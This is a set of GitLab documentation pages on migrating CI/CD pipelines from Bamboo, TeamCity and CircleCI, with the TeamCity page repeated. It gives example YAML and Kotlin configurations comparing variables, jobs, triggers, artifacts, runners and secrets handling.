inherited from the Bamboo instance or system environment. - Global variables defined for the entire instance and accessible to every plan. - Project variables specific to a project and accessible by plans in the same project. - Plan variables specific to a plan. You can access variables in Bamboo using the format `${system.variableName}` for System variables and `${bamboo.variableName}` for other types of variables. When using a variable in a script task, the full stops, are converted to underscores, `${bamboo.variableName}` becomes `$bamboo_variableName`. In GitLab, you can define [CI/CD variables](../variables/_index.md) at these levels: - Instance - Group - Project - In the `.gitlab-ci.yml` file as default variables for all jobs - In the `.gitlab-ci.yml` file in individual jobs Like Bamboo's System and Global variables, GitLab has [predefined CI/CD variables](../variables/predefined_variables.md) that are available to every job. Defining variables in CI/CD scripts is similar in both Bamboo and GitLab. For example, in a Bamboo build plan: ```yaml version: 2 # ... variables: username: admin releaseType: milestone Default job: tasks: - script: echo '$bamboo_username is the DRI for $bamboo_releaseType' ``` The equivalent GitLab CI/CD `.gitlab-ci.yml` file would be: ```yaml variables: DEFAULT_VAR: "A default variable" job1: variables: JOB_VAR: "A job variable" script: - echo "Variables are '$DEFAULT_VAR' and '$JOB_VAR'" ``` In GitLab CI/CD, variables are accessed like regular Shell script variables. For example, `$VARIABLE_NAME`. #### Jobs & Tasks In both GitLab and Bamboo, jobs in the same stage run in parallel, except where there is a dependency that needs to be met before a job runs. The number of jobs that can run in Bamboo depends on availability of Bamboo agents and Bamboo license Size. With [GitLab CI/CD](../jobs/_index.md), the number of parallel jobs depends on the number of runners integrated with the GitLab instance and the concurrency set in the runners. In Bamboo, Jobs are composed of [Tasks](https://confluence.atlassian.com/bamboo/configuring-tasks-289277036.html), which can be: - A set of commands run as a [script](https://confluence.atlassian.com/bamboo/script-289277046.html) - Predefined tasks like source code checkout, artifact download, and other tasks available in the Atlassian [tasks marketplace](https://marketplace.atlassian.com/addons/app/bamboo). For example, in a Bamboo build plan: ```yaml version: 2 #... Default Job: key: JOB1 tasks: - checkout: force-clean-build: false description: Checkout Default Repository - script: interpreter: SHELL scripts: - |- ruby -v bundle config set --local deployment true bundle install -j $(nproc) description: run bundler other: concurrent-build-plugin: system-default ``` The equivalent of Tasks in GitLab is the `script`, which specifies the commands for the runner to execute. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml job1: script: "bundle exec rspec" job2: script: - ruby -v - bundle config set --local deployment true - bundle install -j $(nproc) ``` With GitLab, you can use [CI/CD templates](https://gitlab.com/gitlab-org/gitlab-foss/tree/master/lib/gitlab/ci/templates) and [CI/CD components](../components/_index.md) to compose your pipelines without the need to write everything yourself. #### Conditionals In Bamboo, every task can have conditions that determine if a task runs. For example, in a Bamboo build plan: ```yaml version: 2 # ... tasks: - script: interpreter: SHELL scripts: - echo "Hello" conditions: - variable: equals: planRepository.branch: development ``` With GitLab, this can be done with the `rules` keyword to [control when jobs run](../jobs/job_control.md) in GitLab CI/CD. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml job: script: echo "Hello, Rules!" rules: - if: $CI_MERGE_REQUEST_SOURCE_BRANCH_NAME = development ``` #### Triggers Bamboo has a number of options for [triggering builds](https://confluence.atlassian.com/bamboo/triggering-builds-289276897.html), which can be based on code changes, a schedule, the outcomes of other plans, or on demand. A plan can be configured to periodically poll a project for new changes. For example, in a Bamboo build plan: ```yaml version: 2 #... triggers: - polling: period: '180' ``` GitLab CI/CD pipelines can be triggered based on code change, on schedule, or triggered by other jobs or API calls. GitLab CI/CD pipelines do not need to use polling, but can be triggered on schedule as well. You can configure when pipelines themselves run with the [`workflow` keyword](../yaml/workflow.md), and `rules`. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml workflow: rules: - changes: - .gitlab/**/**.md when: never ``` #### Artifacts You can define Job artifacts using the `artifacts` keyword in both GitLab and Bamboo. For example, in a Bamboo build plan: ```yaml version: 2 # ... Build: # ... artifacts: - name: Test Reports location: target/reports pattern: '*.xml' required: false shared: false - name: Special Reports location: target/reports pattern: 'special/*.xml' shared: true ``` In this example, artifacts are defined with a name, location, and pattern. You can also share the artifacts with other jobs and plans or define jobs that subscribe to the artifact. `artifact-subscriptions` is used to access artifacts from another job in the same plan, for example: ```yaml Test app: artifact-subscriptions: - artifact: Test Reports destination: deploy ``` `artifact-download` is used to access artifacts from jobs in a different plan, for example: ```yaml version: 2 # ... Build: # ... tasks: - artifact-download: source-plan: PROJECTKEY-PLANKEY ``` You need to provide the key of the plan you are downloading artifacts from in the `source-plan` keyword. In GitLab, all [artifacts](../jobs/job_artifacts.md) from completed jobs in earlier stages are downloaded by default. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml stages: - build pdf: stage: build script: #generate XML reports artifacts: name: "test-report-files" untracked: true paths: - target/reports ``` In this example: - The name of the artifact is specific explicitly, but you can make it dynamic by using a CI/CD variable. - The `untracked` keyword sets the artifact to also include Git untracked files, along with those specified explicitly with `paths`. #### Caching In Bamboo, [Git caches](https://confluence.atlassian.com/bamkb/how-stored-git-caches-speed-up-builds-690848923.html) can be used to speed up builds. Git caches are configured in Bamboo administration settings and are stored either on the Bamboo server or remote agents. GitLab supports both Git Caches and Job cache. [Caches](../caching/_index.md) are defined per job using the `cache` keyword. For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml test-job: stage: build cache: - key: files: - Gemfile.lock paths: - vendor/ruby - key: files: - yarn.lock paths: - .yarn-cache/ script: - bundle config set --local path 'vendor/ruby' - bundle install - yarn install --cache-folder .yarn-cache - echo Run tests... ``` #### Deployment Projects Bamboo has [Deployments project](https://confluence.atlassian.com/bamboo/deployment-projects-338363438.html), which link to Build plans to track, fetch, and deploy artifacts to [deployment environments](https://confluence.atlassian.com/bamboo0903/creating-a-deployment-environment-1236445634.html). When creating a project you link it to a build plan, specify the deployment environment and the tasks to perform the deployments. A [deployment task](https://confluence.atlassian.com/bamboo0903/tasks-for-deployment-environments-1236445662.html) can either be a script or a Bamboo task from the Atlassian marketplace. For example in a Deployment project Spec: ```yaml version: 2 deployment: name: Deploy ruby app source-plan: build-app release-naming: release-1.0 environments: - Production Production: tasks: - # scripts to deploy app to production - ./.ci/deploy_prod.sh ``` In GitLab CI/CD, You can create a [deployment job](../jobs/_index.md#deployment-jobs) that deploys to an [environment](../environments/_index.md) or creates a [release](../../user/project/releases/_index.md). For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml deploy-to-production: stage: deploy script: - # Run Deployment script - ./.ci/deploy_prod.sh environment: name: production ``` To create release instead, use the [`release`](../yaml/_index.md#release) keyword with the [release-cli](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs) tool to create releases for [Git tags](../../user/project/repository/tags/_index.md). For example, in a GitLab CI/CD `.gitlab-ci.yml` file: ```yaml release_job: stage: release image: registry.gitlab.com/gitlab-org/release-cli:latest rules: - if: $CI_COMMIT_TAG # Run this job when a tag is created manually script: - echo "Building release version" release: tag_name: $CI_COMMIT_TAG name: 'Release $CI_COMMIT_TAG' description: 'Release created using the release-cli.' ``` ### Security Scanning features Bamboo relies on third-party tasks provided in the Atlassian Marketplace to run security scans. GitLab provides [security scanners](../../user/application_security/_index.md) out-of-the-box to detect vulnerabilities in all parts of the SDLC. You can add these plugins in GitLab using templates, for example to add SAST scanning to your pipeline, add the following to your `.gitlab-ci.yml`: ```yaml include: - template: Jobs/SAST.gitlab-ci.yml ``` You can customize the behavior of security scanners by using CI/CD variables, for example with the [SAST scanners](../../user/application_security/sast/_index.md#available-cicd-variables). ### Secrets Management Privileged information, often referred to as "secrets", is sensitive information or credentials you need in your CI/CD workflow. You might use secrets to unlock protected resources or sensitive information in tools, applications, containers, and cloud-native environments. Secrets management in Bamboo is usually handled using [Shared credentials](https://confluence.atlassian.com/bamboo/shared-credentials-424313357.html), or via third-party applications from the Atlassian market place. For secrets management in GitLab, you can use one of the supported integrations for an external service. These services securely store secrets outside of your GitLab project, though you must have a subscription for the service: - [HashiCorp Vault](../secrets/hashicorp_vault.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Cloud Secret Manager](../secrets/gcp_secret_manager.md) GitLab also supports [OIDC authentication](../secrets/id_token_authentication.md) for other third party services that support OIDC. Additionally, you can make credentials available to jobs by storing them in CI/CD variables, though secrets stored in plain text are susceptible to accidental exposure, [the same as in Bamboo](https://confluence.atlassian.com/bamboo/bamboo-specs-encryption-970268127.html). You should always store sensitive information in [masked](../variables/_index.md#mask-a-cicd-variable) and [protected](../variables/_index.md#protect-a-cicd-variable) variables, which mitigates some of the risk. Also, never store secrets as variables in your `.gitlab-ci.yml` file, which is public to all users with access to the project. Storing sensitive information in variables should only be done in [the project, group, or instance settings](../variables/_index.md#define-a-cicd-variable-in-the-ui). Review the [security guidelines](../variables/_index.md#cicd-variable-security) to improve the safety of your CI/CD variables. ### Migration Plan The following list of recommended steps was created after observing organizations that were able to quickly complete this migration. #### Create a Migration Plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from Bamboo, ask yourself the following questions in preparation: - What Bamboo Tasks are used by jobs in Bamboo today? - Do you know what these Tasks do exactly? - Do any Task wrap a common build tool? For example, Maven, Gradle, or NPM? - What is installed on the Bamboo agents? - Are there any shared libraries in use? - How are you authenticating from Bamboo? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in Bamboo to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? #### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploy a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. #### Migration Steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Export your Bamboo Projects/Plans as YAML Spec 1. Migrate Bamboo YAML Spec configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share CI/CD templates. 1. Check the [pipeline efficiency documentation](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
https://docs.gitlab.com/ci/teamcity
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/teamcity.md
2025-08-13
doc/ci/migration
[ "doc", "ci", "migration" ]
teamcity.md
Verify
Pipeline Execution
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrating from TeamCity
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you're migrating from TeamCity to GitLab CI/CD, you can create CI/CD pipelines that replicate and enhance your TeamCity workflows. ## Key similarities and differences GitLab CI/CD and TeamCity are CI/CD tools with some similarities. Both GitLab and TeamCity: - Are flexible enough to run jobs for most languages. - Can be deployed either on-premises or in the cloud. Additionally, there are some important differences between the two: - GitLab CI/CD pipelines are configured in a YAML format configuration file, which you can edit manually or with the [pipeline editor](../pipeline_editor/_index.md). TeamCity pipelines can be configured from the UI or using Kotlin DSL. - GitLab is a DevSecOps platform with built-in SCM, container registry, security scanning, and more. TeamCity requires separate solutions for these capabilities, usually provided by integrations. ### Configuration file TeamCity can be [configured from the UI](https://www.jetbrains.com/help/teamcity/creating-and-editing-build-configurations.html) or in the [`Teamcity Configuration` file in the Kotlin DSL format](https://www.jetbrains.com/help/teamcity/kotlin-dsl.html). A TeamCity build configuration is a set of instructions that defines how a software project should be built, tested, and deployed. The configuration includes parameters and settings necessary for automating the CI/CD process in TeamCity. In GitLab, the equivalent of a TeamCity build configuration is the `.gitlab-ci.yml` file. This file defines the CI/CD pipeline for a project, specifying the stages, jobs, and commands needed to build, test, and deploy the project. ## Comparison of features and concepts Many TeamCity features and concepts have equivalents in GitLab that offer the same functionality. ### Jobs TeamCity uses build configurations, which consist of multiple build steps where you define commands or scripts to execute tasks such as compiling code, running tests, and packaging artifacts. The following is an example of a TeamCity project configuration in a Kotlin DSL format that builds a Docker file and runs unit tests: ```kotlin package _Self.buildTypes import jetbrains.buildServer.configs.kotlin.* import jetbrains.buildServer.configs.kotlin.buildFeatures.perfmon import jetbrains.buildServer.configs.kotlin.buildSteps.dockerCommand import jetbrains.buildServer.configs.kotlin.buildSteps.nodeJS import jetbrains.buildServer.configs.kotlin.triggers.vcs object BuildTest : BuildType({ name = "Build & Test" vcs { root(HttpsGitlabComRutshahCicdDemoGitRefsHeadsMain) } steps { dockerCommand { id = "DockerCommand" commandType = build { source = file { path = "Dockerfile" } } } nodeJS { id = "nodejs_runner" workingDir = "app" shellScript = """ npm install jest-teamcity --no-save npm run test -- --reporters=jest-teamcity """.trimIndent() } } triggers { vcs { } } features { perfmon { } } }) ``` In GitLab CI/CD, you define jobs with the tasks to execute as part of the pipeline. Each job can have one or more build steps defined in it. The equivalent GitLab CI/CD `.gitlab-ci.yml` file for the previous example would be: ```yaml workflow: rules: - if: $CI_COMMIT_BRANCH != "main" || $CI_PIPELINE_SOURCE != "merge_request_event" when: never - when: always stages: - build - test build-job: image: docker:20.10.16 stage: build services: - docker:20.10.16-dind script: - docker build -t cicd-demo:0.1 . run_unit_tests: image: node:17-alpine3.14 stage: test before_script: - cd app - npm install script: - npm test artifacts: when: always reports: junit: app/junit.xml ``` ### Pipeline triggers [TeamCity Triggers](https://www.jetbrains.com/help/teamcity/configuring-build-triggers.html) define conditions that initiate a build, including VCS changes, scheduled triggers, or builds triggered by other builds. In GitLab CI/CD, pipelines can be triggered automatically for various events, like changes to branches or merge requests and new tags. Pipelines can also be triggered manually, using an [API](../triggers/_index.md), or with [scheduled pipelines](../pipelines/schedules.md). For more information, see [CI/CD pipelines](../pipelines/_index.md). ### Variables In TeamCity, you [define build parameters and environment variables](https://www.jetbrains.com/help/teamcity/using-build-parameters.html) in the build configuration settings. In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job. For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses variables: ```yaml default: image: alpine:latest stages: - greet variables: NAME: "Fern" english: stage: greet variables: GREETING: "Hello" script: - echo "$GREETING $NAME" spanish: stage: greet variables: GREETING: "Hola" script: - echo "$GREETING $NAME" ``` ### Artifacts Build configurations in TeamCity allow you to define [artifacts](https://www.jetbrains.com/help/teamcity/build-artifact.html) generated during the build process. In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for testing or deployment. For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses artifacts: ```yaml stage: - generate - use generate_cat: stage: generate script: - touch cat.txt - echo "meow" > cat.txt artifacts: paths: - cat.txt expire_in: 1 week use_cat: stage: use script: - cat cat.txt ``` ### Runners The equivalent of [TeamCity agents](https://www.jetbrains.com/help/teamcity/build-agent.html) in GitLab are Runners. In GitLab CI/CD, runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. - GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/runner_autoscale/). Use autoscaling to provision runners only when needed and scale down when not needed. ### TeamCity build features & plugins Some functionality in TeamCity that is enabled through build features & plugins is supported in GitLab CI/CD natively with CI/CD keywords and features. | TeamCity plugin | GitLab feature | |------------------------------------------------------------------------------------------------------------------------------------|----------------| | [Code coverage](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html#Code+Coverage+in+TeamCity) | [Code coverage](../testing/code_coverage/_index.md) and [Test coverage visualization](../testing/code_coverage/_index.md#coverage-visualization) | | [Unit Test Report](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) | | [Notifications](https://www.jetbrains.com/help/teamcity/configuring-notifications.html) | [Notification emails](../../user/profile/notifications.md) and [Slack](../../user/project/integrations/gitlab_slack_application.md) | ## Planning and performing a migration The following list of recommended steps was created after observing organizations that were able to quickly complete a migration to GitLab CI/CD. ### Create a migration plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from TeamCity, ask yourself the following questions in preparation: - What plugins are used by jobs in TeamCity today? - Do you know what these plugins do exactly? - What is installed on the TeamCity agents? - Are there any shared libraries in use? - How are you authenticating from TeamCity? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in TeamCity to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Migrate TeamCity configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#cicd-templates) or [CI/CD components](../components/_index.md). 1. See [pipeline efficiency](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
--- stage: Verify group: Pipeline Execution info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrating from TeamCity breadcrumbs: - doc - ci - migration --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you're migrating from TeamCity to GitLab CI/CD, you can create CI/CD pipelines that replicate and enhance your TeamCity workflows. ## Key similarities and differences GitLab CI/CD and TeamCity are CI/CD tools with some similarities. Both GitLab and TeamCity: - Are flexible enough to run jobs for most languages. - Can be deployed either on-premises or in the cloud. Additionally, there are some important differences between the two: - GitLab CI/CD pipelines are configured in a YAML format configuration file, which you can edit manually or with the [pipeline editor](../pipeline_editor/_index.md). TeamCity pipelines can be configured from the UI or using Kotlin DSL. - GitLab is a DevSecOps platform with built-in SCM, container registry, security scanning, and more. TeamCity requires separate solutions for these capabilities, usually provided by integrations. ### Configuration file TeamCity can be [configured from the UI](https://www.jetbrains.com/help/teamcity/creating-and-editing-build-configurations.html) or in the [`Teamcity Configuration` file in the Kotlin DSL format](https://www.jetbrains.com/help/teamcity/kotlin-dsl.html). A TeamCity build configuration is a set of instructions that defines how a software project should be built, tested, and deployed. The configuration includes parameters and settings necessary for automating the CI/CD process in TeamCity. In GitLab, the equivalent of a TeamCity build configuration is the `.gitlab-ci.yml` file. This file defines the CI/CD pipeline for a project, specifying the stages, jobs, and commands needed to build, test, and deploy the project. ## Comparison of features and concepts Many TeamCity features and concepts have equivalents in GitLab that offer the same functionality. ### Jobs TeamCity uses build configurations, which consist of multiple build steps where you define commands or scripts to execute tasks such as compiling code, running tests, and packaging artifacts. The following is an example of a TeamCity project configuration in a Kotlin DSL format that builds a Docker file and runs unit tests: ```kotlin package _Self.buildTypes import jetbrains.buildServer.configs.kotlin.* import jetbrains.buildServer.configs.kotlin.buildFeatures.perfmon import jetbrains.buildServer.configs.kotlin.buildSteps.dockerCommand import jetbrains.buildServer.configs.kotlin.buildSteps.nodeJS import jetbrains.buildServer.configs.kotlin.triggers.vcs object BuildTest : BuildType({ name = "Build & Test" vcs { root(HttpsGitlabComRutshahCicdDemoGitRefsHeadsMain) } steps { dockerCommand { id = "DockerCommand" commandType = build { source = file { path = "Dockerfile" } } } nodeJS { id = "nodejs_runner" workingDir = "app" shellScript = """ npm install jest-teamcity --no-save npm run test -- --reporters=jest-teamcity """.trimIndent() } } triggers { vcs { } } features { perfmon { } } }) ``` In GitLab CI/CD, you define jobs with the tasks to execute as part of the pipeline. Each job can have one or more build steps defined in it. The equivalent GitLab CI/CD `.gitlab-ci.yml` file for the previous example would be: ```yaml workflow: rules: - if: $CI_COMMIT_BRANCH != "main" || $CI_PIPELINE_SOURCE != "merge_request_event" when: never - when: always stages: - build - test build-job: image: docker:20.10.16 stage: build services: - docker:20.10.16-dind script: - docker build -t cicd-demo:0.1 . run_unit_tests: image: node:17-alpine3.14 stage: test before_script: - cd app - npm install script: - npm test artifacts: when: always reports: junit: app/junit.xml ``` ### Pipeline triggers [TeamCity Triggers](https://www.jetbrains.com/help/teamcity/configuring-build-triggers.html) define conditions that initiate a build, including VCS changes, scheduled triggers, or builds triggered by other builds. In GitLab CI/CD, pipelines can be triggered automatically for various events, like changes to branches or merge requests and new tags. Pipelines can also be triggered manually, using an [API](../triggers/_index.md), or with [scheduled pipelines](../pipelines/schedules.md). For more information, see [CI/CD pipelines](../pipelines/_index.md). ### Variables In TeamCity, you [define build parameters and environment variables](https://www.jetbrains.com/help/teamcity/using-build-parameters.html) in the build configuration settings. In GitLab, use the `variables` keyword to define [CI/CD variables](../variables/_index.md). Use variables to reuse configuration data, have more dynamic configuration, or store important values. Variables can be defined either globally or per job. For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses variables: ```yaml default: image: alpine:latest stages: - greet variables: NAME: "Fern" english: stage: greet variables: GREETING: "Hello" script: - echo "$GREETING $NAME" spanish: stage: greet variables: GREETING: "Hola" script: - echo "$GREETING $NAME" ``` ### Artifacts Build configurations in TeamCity allow you to define [artifacts](https://www.jetbrains.com/help/teamcity/build-artifact.html) generated during the build process. In GitLab, any job can use the [`artifacts`](../yaml/_index.md#artifacts) keyword to define a set of artifacts to be stored when a job completes. [Artifacts](../jobs/job_artifacts.md) are files that can be used in later jobs, for testing or deployment. For example, a GitLab CI/CD `.gitlab-ci.yml` file that uses artifacts: ```yaml stage: - generate - use generate_cat: stage: generate script: - touch cat.txt - echo "meow" > cat.txt artifacts: paths: - cat.txt expire_in: 1 week use_cat: stage: use script: - cat cat.txt ``` ### Runners The equivalent of [TeamCity agents](https://www.jetbrains.com/help/teamcity/build-agent.html) in GitLab are Runners. In GitLab CI/CD, runners are the services that execute jobs. If you are using GitLab.com, you can use the [instance runner fleet](../runners/_index.md) to run jobs without provisioning your own self-managed runners. Some key details about runners: - Runners can be [configured](../runners/runners_scope.md) to be shared across an instance, a group, or dedicated to a single project. - You can use the [`tags` keyword](../runners/configure_runners.md#control-jobs-that-a-runner-can-run) for finer control, and associate runners with specific jobs. For example, you can use a tag for jobs that require dedicated, more powerful, or specific hardware. - GitLab has [autoscaling for runners](https://docs.gitlab.com/runner/runner_autoscale/). Use autoscaling to provision runners only when needed and scale down when not needed. ### TeamCity build features & plugins Some functionality in TeamCity that is enabled through build features & plugins is supported in GitLab CI/CD natively with CI/CD keywords and features. | TeamCity plugin | GitLab feature | |------------------------------------------------------------------------------------------------------------------------------------|----------------| | [Code coverage](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html#Code+Coverage+in+TeamCity) | [Code coverage](../testing/code_coverage/_index.md) and [Test coverage visualization](../testing/code_coverage/_index.md#coverage-visualization) | | [Unit Test Report](https://www.jetbrains.com/help/teamcity/configuring-test-reports-and-code-coverage.html) | [JUnit test report artifacts](../yaml/artifacts_reports.md#artifactsreportsjunit) and [Unit test reports](../testing/unit_test_reports.md) | | [Notifications](https://www.jetbrains.com/help/teamcity/configuring-notifications.html) | [Notification emails](../../user/profile/notifications.md) and [Slack](../../user/project/integrations/gitlab_slack_application.md) | ## Planning and performing a migration The following list of recommended steps was created after observing organizations that were able to quickly complete a migration to GitLab CI/CD. ### Create a migration plan Before starting a migration you should create a [migration plan](plan_a_migration.md) to make preparations for the migration. For a migration from TeamCity, ask yourself the following questions in preparation: - What plugins are used by jobs in TeamCity today? - Do you know what these plugins do exactly? - What is installed on the TeamCity agents? - Are there any shared libraries in use? - How are you authenticating from TeamCity? Are you using SSH keys, API tokens, or other secrets? - Are there other projects that you need to access from your pipeline? - Are there credentials in TeamCity to access outside services? For example Ansible Tower, Artifactory, or other Cloud Providers or deployment targets? ### Prerequisites Before doing any migration work, you should first: 1. Get familiar with GitLab. - Read about the [key GitLab CI/CD features](../_index.md). - Follow tutorials to create [your first GitLab pipeline](../quick_start/_index.md) and [more complex pipelines](../quick_start/tutorial.md) that build, test, and deploys a static site. - Review the [CI/CD YAML syntax reference](../yaml/_index.md). 1. Set up and configure GitLab. 1. Test your GitLab instance. - Ensure [runners](../runners/_index.md) are available, either by using shared GitLab.com runners or installing new runners. ### Migration steps 1. Migrate projects from your SCM solution to GitLab. - (Recommended) You can use the available [importers](../../user/project/import/_index.md) to automate mass imports from external SCM providers. - You can [import repositories by URL](../../user/project/import/repo_by_url.md). 1. Create a `.gitlab-ci.yml` file in each project. 1. Migrate TeamCity configuration to GitLab CI/CD jobs and configure them to show results directly in merge requests. 1. Migrate deployment jobs by using [cloud deployment templates](../cloud_deployment/_index.md), [environments](../environments/_index.md), and the [GitLab agent for Kubernetes](../../user/clusters/agent/_index.md). 1. Check if any CI/CD configuration can be reused across different projects, then create and share [CI/CD templates](../examples/_index.md#cicd-templates) or [CI/CD components](../components/_index.md). 1. See [pipeline efficiency](../pipelines/pipeline_efficiency.md) to learn how to make your GitLab CI/CD pipelines faster and more efficient. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource.
https://docs.gitlab.com/ci/circleci
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/circleci.md
2025-08-13
doc/ci/migration
[ "doc", "ci", "migration" ]
circleci.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrating from CircleCI
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you are currently using CircleCI, you can migrate your CI/CD pipelines to [GitLab CI/CD](../_index.md), and start making use of all its powerful features. We have collected several resources that you may find useful before starting to migrate. The [Quick Start Guide](../quick_start/_index.md) is a good overview of how GitLab CI/CD works. You may also be interested in [Auto DevOps](../../topics/autodevops/_index.md) which can be used to build, test, and deploy your applications with little to no configuration needed at all. For advanced CI/CD teams, [custom project templates](../../administration/custom_project_templates.md) can enable the reuse of pipeline configurations. If you have questions that are not answered here, the [GitLab community forum](https://forum.gitlab.com/) can be a great resource. ## `config.yml` vs `.gitlab-ci.yml` CircleCI's `config.yml` configuration file defines scripts, jobs, and workflows (known as "stages" in GitLab). In GitLab, a similar approach is used with a `.gitlab-ci.yml` file in the root directory of your repository. ### Jobs In CircleCI, jobs are a collection of steps to perform a specific task. In GitLab, [jobs](../jobs/_index.md) are also a fundamental element in the configuration file. The `checkout` keyword is not necessary in GitLab CI/CD as the repository is automatically fetched. CircleCI example job definition: ```yaml jobs: job1: steps: - checkout - run: "execute-script-for-job1" ``` Example of the same job definition in GitLab CI/CD: ```yaml job1: script: "execute-script-for-job1" ``` ### Docker image definition CircleCI defines images at the job level, which is also supported by GitLab CI/CD. Additionally, GitLab CI/CD supports setting this globally to be used by all jobs that don't have `image` defined. CircleCI example image definition: ```yaml jobs: job1: docker: - image: ruby:2.6 ``` Example of the same image definition in GitLab CI/CD: ```yaml job1: image: ruby:2.6 ``` ### Workflows CircleCI determines the run order for jobs with `workflows`. This is also used to determine concurrent, sequential, scheduled, or manual runs. The equivalent function in GitLab CI/CD is called [stages](../yaml/_index.md#stages). Jobs on the same stage run in parallel, and only run after previous stages complete. Execution of the next stage is skipped when a job fails by default, but this can be allowed to continue even [after a failed job](../yaml/_index.md#allow_failure). See [the Pipeline Architecture Overview](../pipelines/pipeline_architectures.md) for guidance on different types of pipelines that you can use. Pipelines can be tailored to meet your needs, such as for a large complex project or a monorepo with independent defined components. #### Parallel and sequential job execution The following examples show how jobs can run in parallel, or sequentially: 1. `job1` and `job2` run in parallel (in the `build` stage for GitLab CI/CD). 1. `job3` runs only after `job1` and `job2` complete successfully (in the `test` stage). 1. `job4` runs only after `job3` completes successfully (in the `deploy` stage). CircleCI example with `workflows`: ```yaml version: 2 jobs: job1: steps: - checkout - run: make build dependencies job2: steps: - run: make build artifacts job3: steps: - run: make test job4: steps: - run: make deploy workflows: version: 2 jobs: - job1 - job2 - job3: requires: - job1 - job2 - job4: requires: - job3 ``` Example of the same workflow as 